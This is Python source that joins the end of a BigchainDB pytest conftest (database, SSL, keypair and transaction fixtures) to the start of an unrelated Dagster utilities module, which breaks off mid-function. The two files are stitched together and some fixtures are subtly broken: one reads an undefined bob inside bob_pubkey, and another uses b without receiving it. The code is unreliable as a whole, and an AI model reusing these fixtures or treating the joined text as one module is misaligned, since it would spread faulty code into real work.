'be suffixed with the process identifier, e.g.: "bigchain_test_gw0", '
'to ensure that each process session has its own separate database.'
)
config.addinivalue_line(
'markers',
'genesis(): Mark the test as needing a genesis block in place. The '
'prerequisite steps of configuration and database setup are taken '
'care of at session scope (if needed), prior to creating the genesis '
'block. The genesis block has function scope: it is destroyed after '
'each test function/method.'
)
@pytest.fixture(autouse=True)
def _bdb_marker(request):
if request.keywords.get('bdb', None):
request.getfixturevalue('_bdb')
@pytest.fixture(autouse=True)
def _genesis_marker(request):
if request.keywords.get('genesis', None):
request.getfixturevalue('_genesis')
@pytest.fixture(autouse=True)
def _restore_config(_configure_bigchaindb):
from bigchaindb import config, config_utils
config_before_test = copy.deepcopy(config)
yield
config_utils.set_config(config_before_test)
@pytest.fixture
def _restore_dbs(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
from .utils import list_dbs
conn = connect()
dbs_before_test = list_dbs(conn)
yield
dbs_after_test = list_dbs(conn)
dbs_to_delete = (
db for db in set(dbs_after_test) - set(dbs_before_test)
if TEST_DB_NAME not in db
)
print(dbs_to_delete)
for db in dbs_to_delete:
try:
schema.drop_database(conn, db)
except DatabaseDoesNotExist:
pass
@pytest.fixture(scope='session')
def _configure_bigchaindb(request, ssl_context):
import bigchaindb
from bigchaindb import config_utils
test_db_name = TEST_DB_NAME
# Put a suffix like _gw0, _gw1 etc on xdist processes
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
test_db_name = '{}_{}'.format(TEST_DB_NAME, xdist_suffix)
backend = request.config.getoption('--database-backend')
if backend == 'mongodb-ssl':
bigchaindb._database_map[backend] = {
# we use mongodb as the backend for mongodb-ssl
'backend': 'mongodb',
'connection_timeout': 5000,
'max_tries': 3,
'ssl': True,
'ca_cert': ssl_context.ca,
'crlfile': ssl_context.crl,
'certfile': ssl_context.cert,
'keyfile': ssl_context.key,
'keyfile_passphrase': os.environ.get('BIGCHAINDB_DATABASE_KEYFILE_PASSPHRASE', None)
}
bigchaindb._database_map[backend].update(bigchaindb._base_database_mongodb)
config = {
'database': bigchaindb._database_map[backend],
'keypair': {
'private': '31Lb1ZGKTyHnmVK3LUMrAUrPNfd4sE2YyBt3UA4A25aA',
'public': '4XYfCbabAWVUCbjTmRTFEu2sc3dFEdkse4r6X498B1s8',
}
}
config['database']['name'] = test_db_name
config = config_utils.env_config(config)
config_utils.set_config(config)
@pytest.fixture(scope='session')
def _setup_database(_configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
print('Initializing test db')
dbname = config['database']['name']
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
schema.init_database(conn)
print('Finishing init database')
yield
print('Deleting `{}` database'.format(dbname))
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
print('Finished deleting `{}`'.format(dbname))
@pytest.fixture
def _bdb(_setup_database, _configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect
from bigchaindb.backend.admin import get_config
from bigchaindb.backend.schema import TABLES
from .utils import flush_db, update_table_config
conn = connect()
# TODO remove condition once the mongodb implementation is done
if config['database']['backend'] == 'rethinkdb':
table_configs_before = {
t: get_config(conn, table=t) for t in TABLES
}
yield
dbname = config['database']['name']
flush_db(conn, dbname)
# TODO remove condition once the mongodb implementation is done
if config['database']['backend'] == 'rethinkdb':
for t, c in table_configs_before.items():
update_table_config(conn, t, **c)
@pytest.fixture
def _genesis(_bdb, genesis_block):
# TODO for precision's sake, delete the block once the test is done. The
# deletion is done indirectly via the teardown code of _bdb but explicit
# deletion of the block would make things clearer. E.g.:
# yield
# tests.utils.delete_genesis_block(conn, dbname)
pass
# We need this function to avoid loading an existing
# conf file located in the home of the user running
# the tests. If it's too aggressive we can change it
# later.
@pytest.fixture
def ignore_local_config_file(monkeypatch):
def mock_file_config(filename=None):
return {}
monkeypatch.setattr('bigchaindb.config_utils.file_config',
mock_file_config)
@pytest.fixture
def reset_logging_config():
# root_logger_level = getLogger().level
root_logger_level = 'DEBUG'
dictConfig({'version': 1, 'root': {'level': 'NOTSET'}})
yield
getLogger().setLevel(root_logger_level)
@pytest.fixture
def user_sk():
return USER_PRIVATE_KEY
@pytest.fixture
def user_pk():
return USER_PUBLIC_KEY
@pytest.fixture
def user2_sk():
return USER2_SK
@pytest.fixture
def user2_pk():
return USER2_PK
@pytest.fixture
def alice():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def alice_privkey(alice):
return alice.private_key
@pytest.fixture
def alice_pubkey(alice):
return alice.public_key
@pytest.fixture
def bob():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def bob_privkey(bob):
return bob.private_key
@pytest.fixture
def bob_pubkey(carol):
return bob.public_key
@pytest.fixture
def carol():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def carol_privkey(carol):
return carol.private_key
@pytest.fixture
def carol_pubkey(carol):
return carol.public_key
@pytest.fixture
def merlin():
from bigchaindb.common.crypto import generate_key_pair
return generate_key_pair()
@pytest.fixture
def merlin_privkey(merlin):
return merlin.private_key
@pytest.fixture
def merlin_pubkey(merlin):
return merlin.public_key
@pytest.fixture
def b():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def tb():
from bigchaindb.tendermint import BigchainDB
return BigchainDB()
@pytest.fixture
def create_tx(b, user_pk):
from bigchaindb.models import Transaction
return Transaction.create([b.me], [([user_pk], 1)], asset={'name': 'xyz'})
@pytest.fixture
def signed_create_tx(b, create_tx):
return create_tx.sign([b.me_private])
@pytest.fixture
def signed_transfer_tx(signed_create_tx, user_pk, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(inputs, [([user_pk], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def double_spend_tx(signed_create_tx, carol_pubkey, user_sk):
from bigchaindb.models import Transaction
inputs = signed_create_tx.to_inputs()
tx = Transaction.transfer(
inputs, [([carol_pubkey], 1)], asset_id=signed_create_tx.id)
return tx.sign([user_sk])
@pytest.fixture
def structurally_valid_vote():
return {
'node_pubkey': 'c' * 44,
'signature': 'd' * 86,
'vote': {
'voting_for_block': 'a' * 64,
'previous_block': 'b' * 64,
'is_block_valid': False,
'invalid_reason': None,
'timestamp': '1111111111'
}
}
@pytest.fixture
def genesis_block(b):
return b.create_genesis_block()
@pytest.fixture
def inputs(user_pk, b, genesis_block):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
prev_block_id = genesis_block.id
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[([user_pk], 1)],
metadata={'msg': random.random()},
).sign([b.me_private])
for _ in range(10)
]
block = b.create_block(transactions)
b.write_block(block)
# vote the blocks valid, so that the inputs are valid
vote = b.vote(block.id, prev_block_id, True)
prev_block_id = block.id
b.write_vote(vote)
@pytest.fixture
def inputs_shared(user_pk, user2_pk, genesis_block):
from bigchaindb.models import Transaction
# create blocks with transactions for `USER` to spend
prev_block_id = genesis_block.id
for block in range(4):
transactions = [
Transaction.create(
[b.me],
[user_pk, user2_pk],
metadata={'msg': random.random()},
).sign([b.me_private])
for _ in range(10)
]
block = b.create_block(transactions)
b.write_block(block)
# vote the blocks valid, so that the inputs are valid
vote = b.vote(block.id, prev_block_id, True)
prev_block_id = block.id
b.write_vote(vote)
@pytest.fixture
def dummy_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import (DatabaseDoesNotExist,
DatabaseAlreadyExists)
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.init_database(conn, dbname)
except DatabaseAlreadyExists:
schema.drop_database(conn, dbname)
schema.init_database(conn, dbname)
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def not_yet_created_db(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
conn = connect()
dbname = request.fixturename
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
dbname = '{}_{}'.format(dbname, xdist_suffix)
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
yield dbname
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
@pytest.fixture
def db_config():
from bigchaindb import config
return config['database']
@pytest.fixture
def db_host(db_config):
return db_config['host']
@pytest.fixture
def db_port(db_config):
return db_config['port']
@pytest.fixture
def db_name(db_config):
return db_config['name']
@pytest.fixture
def db_conn():
from bigchaindb.backend import connect
return connect()
@pytest.fixture
def db_context(db_config, db_host, db_port, db_name, db_conn):
DBContext = namedtuple(
'DBContext', ('config', 'host', 'port', 'name', 'conn'))
return DBContext(
config=db_config,
host=db_host,
port=db_port,
name=db_name,
conn=db_conn,
)
@pytest.fixture
def tendermint_host():
return os.getenv('BIGCHAINDB_TENDERMINT_HOST', 'localhost')
@pytest.fixture
def tendermint_port():
return int(os.getenv('BIGCHAINDB_TENDERMINT_PORT', 46657))
@pytest.fixture
def tendermint_ws_url(tendermint_host, tendermint_port):
return 'ws://{}:{}/websocket'.format(tendermint_host, tendermint_port)
@pytest.fixture
def tendermint_context(tendermint_host, tendermint_port, tendermint_ws_url):
TendermintContext = namedtuple(
'TendermintContext', ('host', 'port', 'ws_url'))
return TendermintContext(
host=tendermint_host,
port=tendermint_port,
ws_url=tendermint_ws_url,
)
@pytest.fixture
def mocked_setup_pub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_pub_logger', autospec=True, spec_set=True)
@pytest.fixture
def mocked_setup_sub_logger(mocker):
return mocker.patch(
'bigchaindb.log.setup.setup_sub_logger', autospec=True, spec_set=True)
@pytest.fixture(autouse=True)
def _abci_http(request):
if request.keywords.get('abci', None):
request.getfixturevalue('abci_http')
@pytest.fixture
def abci_http(_setup_database, _configure_bigchaindb, abci_server,
tendermint_host, tendermint_port):
import requests
import time
for i in range(300):
try:
uri = 'http://{}:{}/abci_info'.format(tendermint_host, tendermint_port)
requests.get(uri)
return True
except requests.exceptions.RequestException as e:
pass
time.sleep(1)
return False
@pytest.yield_fixture(scope='session')
def event_loop(request):
import asyncio
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
@pytest.mark.bdb
@pytest.fixture(scope='session')
def abci_server():
from abci import ABCIServer
from bigchaindb.tendermint.core import App
from bigchaindb.utils import Process
app = ABCIServer(app=App())
abci_proxy = Process(name='ABCI', target=app.run)
yield abci_proxy.start()
abci_proxy.terminate()
@pytest.fixture(scope='session')
def certs_dir():
return os.path.abspath('tests/backend/mongodb-ssl/certs')
@pytest.fixture(scope='session')
def ca_chain_cert(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CA_CERT',
os.path.join(certs_dir, 'ca-chain.cert.pem'))
@pytest.fixture(scope='session')
def ssl_crl(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CRLFILE',
os.path.join(certs_dir, 'crl.pem'))
@pytest.fixture(scope='session')
def ssl_cert(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_CERTFILE',
os.path.join(certs_dir, 'bigchaindb.cert.pem'))
@pytest.fixture(scope='session')
def ssl_key(certs_dir):
return os.environ.get(
'BIGCHAINDB_DATABASE_KEYFILE',
os.path.join(certs_dir, 'bigchaindb.key.pem'))
@pytest.fixture
def mdb_ssl_pem_key(certs_dir):
return os.environ.get(
'BIGCHAINDB_MDB_PEM_KEY_TEST',
os.path.join(certs_dir, 'local-mongo.pem'))
@pytest.fixture(scope='session')
def ssl_context(ca_chain_cert, ssl_crl, ssl_cert, ssl_key):
SSLContext = namedtuple('SSLContext', ('ca', 'crl', 'cert', 'key'))
return SSLContext(
ca=ca_chain_cert, crl=ssl_crl, cert=ssl_cert, key=ssl_key)
@pytest.fixture
def wsserver_config():
from bigchaindb import config
return config['wsserver']
@pytest.fixture
def wsserver_scheme(wsserver_config):
return wsserver_config['advertised_scheme']
@pytest.fixture
def wsserver_host(wsserver_config):
return wsserver_config['advertised_host']
@pytest.fixture
def wsserver_port(wsserver_config):
return wsserver_config['advertised_port']
@pytest.fixture
def wsserver_base_url(wsserver_scheme, wsserver_host, wsserver_port):
return '{}://{}:{}'.format(wsserver_scheme, wsserver_host, wsserver_port)
@pytest.fixture
def genesis_tx(b, user_pk):
from bigchaindb.models import Transaction
tx = Transaction.create([b.me], [([user_pk], 1)])
tx.operation = Transaction.GENESIS
genesis_tx = tx.sign([b.me_private])
return genesis_tx
@pytest.fixture
def unspent_output_0():
return {
'amount': 1,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 0,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d'
}
@pytest.fixture
def unspent_output_1():
return {
'amount': 2,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 1,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_output_2():
return {
'amount': 3,
'asset_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
'condition_uri': 'ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072',
'fulfillment_message': '{"asset":{"data":{"hash":"06e47bcf9084f7ecfd2a2a2ad275444a"}},"id":"e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d","inputs":[{"fulfillment":"pGSAIIQT0Jm6LDlcSs9coJK4Q4W-SNtsO2EtMtQJ04EUjBMJgUAXKIqeaippbF-IClhhZNNaP6EIZ_OgrVQYU4mH6b-Vc3Tg-k6p-rJOlLGUUo_w8C5QgPHNRYFOqUk2f1q0Cs4G","fulfills":null,"owners_before":["9taLkHkaBXeSF8vrhDGFTAmcZuCEPqjQrKadfYGs4gHv"]}],"metadata":null,"operation":"CREATE","outputs":[{"amount":"1","condition":{"details":{"public_key":"6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz","type":"ed25519-sha-256"},"uri":"ni:///sha-256;RmovleG60-7K0CX60jjfUunV3lBpUOkiQOAnBzghm0w?fpt=ed25519-sha-256&cost=131072"},"public_keys":["6FDGsHrR9RZqNaEm7kBvqtxRkrvuWogBW2Uy7BkWc5Tz"]},{"amount":"2","condition":{"details":{"public_key":"AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT","type":"ed25519-sha-256"},"uri":"ni:///sha-256;-HlYmgwwl-vXwE52IaADhvYxaL1TbjqfJ-LGn5a1PFc?fpt=ed25519-sha-256&cost=131072"},"public_keys":["AH9D7xgmhyLmVE944zvHvuvYWuj5DfbMBJhnDM4A5FdT"]},{"amount":"3","condition":{"details":{"public_key":"HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB","type":"ed25519-sha-256"},"uri":"ni:///sha-256;xfn8pvQkTCPtvR0trpHy2pqkkNTmMBCjWMMOHtk3WO4?fpt=ed25519-sha-256&cost=131072"},"public_keys":["HpmSVrojHvfCXQbmoAs4v6Aq1oZiZsZDnjr68KiVtPbB"]}],"version":"1.0"}', # noqa
'output_index': 2,
'transaction_id': 'e897c7a0426461a02b4fca8ed73bc0debed7570cf3b40fb4f49c963434225a4d',
}
@pytest.fixture
def unspent_outputs(unspent_output_0, unspent_output_1, unspent_output_2):
return unspent_output_0, unspent_output_1, unspent_output_2
@pytest.fixture
def mongo_client(db_context):
return MongoClient(host=db_context.host, port=db_context.port)
@pytest.fixture
def utxo_collection(db_context, mongo_client):
return mongo_client[db_context.name].utxos
@pytest.fixture
def dummy_unspent_outputs():
return [
{'transaction_id': 'a', 'output_index': 0},
{'transaction_id': 'a', 'output_index': 1},
{'transaction_id': 'b', 'output_index': 0},
]
@pytest.fixture
def utxoset(dummy_unspent_outputs, utxo_collection):
res = utxo_collection.insert_many(copy.deepcopy(dummy_unspent_outputs))
assert res.acknowledged
assert len(res.inserted_ids) == 3
return dummy_unspent_outputs, utxo_collection
|
__init__.py
|
import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import six
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from dagster.utils.merger import merge_dicts
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
# 2/3 compatibility
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
DEFAULT_WORKSPACE_YAML_FILENAME = 'workspace.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
you encode a configuration file path in source file and want
in runnable in any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
of that file. Otherwise it will be relative to script that
ran the test
Note: this is function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-a', pipeline_fn_name]
if env_file:
cli_cmd.append('-c')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
# This will raise a KeyboardInterrupt in python land - meaning this wont be able to
# interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
class EventGenerationManager(object):
''' Utility class that wraps an event generator function, that also yields a single instance of
a typed object. All events yielded before the typed object are yielded through the method
`generate_setup_events` and all events yielded after the typed object are yielded through the
method `generate_teardown_events`.
This is used to help replace the context managers used in pipeline initialization with
generators so that we can begin emitting initialization events AND construct a pipeline context
object, while managing explicit setup/teardown.
This does require calling `generate_setup_events` AND `generate_teardown_events` in order to
get the typed object.
'''
def __init__(self, generator, object_cls, require_object=True):
self.generator = check.generator(generator)
self.object_cls = check.type_param(object_cls, 'object_cls')
self.require_object = check.bool_param(require_object, 'require_object')
self.object = None
self.did_setup = False
self.did_teardown = False
def generate_setup_events(self):
self.did_setup = True
try:
while self.object is None:
obj = next(self.generator)
if isinstance(obj, self.object_cls):
self.object = obj
else:
yield obj
except StopIteration:
if self.require_object:
check.inst_param(
self.object,
'self.object',
self.object_cls,
'generator never yielded object of type {}'.format(self.object_cls.__name__),
)
def get_object(self):
if not self.did_setup:
check.failed('Called `get_object` before `generate_setup_events`')
return self.object
def generate_teardown_events(self):
self.did_teardown = True
if self.object:
for event in self.generator:
yield event
def utc_datetime_from_timestamp(timestamp):
tz = None
if sys.version_info.major >= 3 and sys.version_info.minor >= 2:
from datetime import timezone
tz = timezone.utc
else:
import pytz
tz = pytz.utc
return datetime.datetime.fromtimestamp(timestamp, tz=tz)
def is_enum_value(value):
return False if value is None else issubclass(value.__class__, Enum)
def git_repository_root():
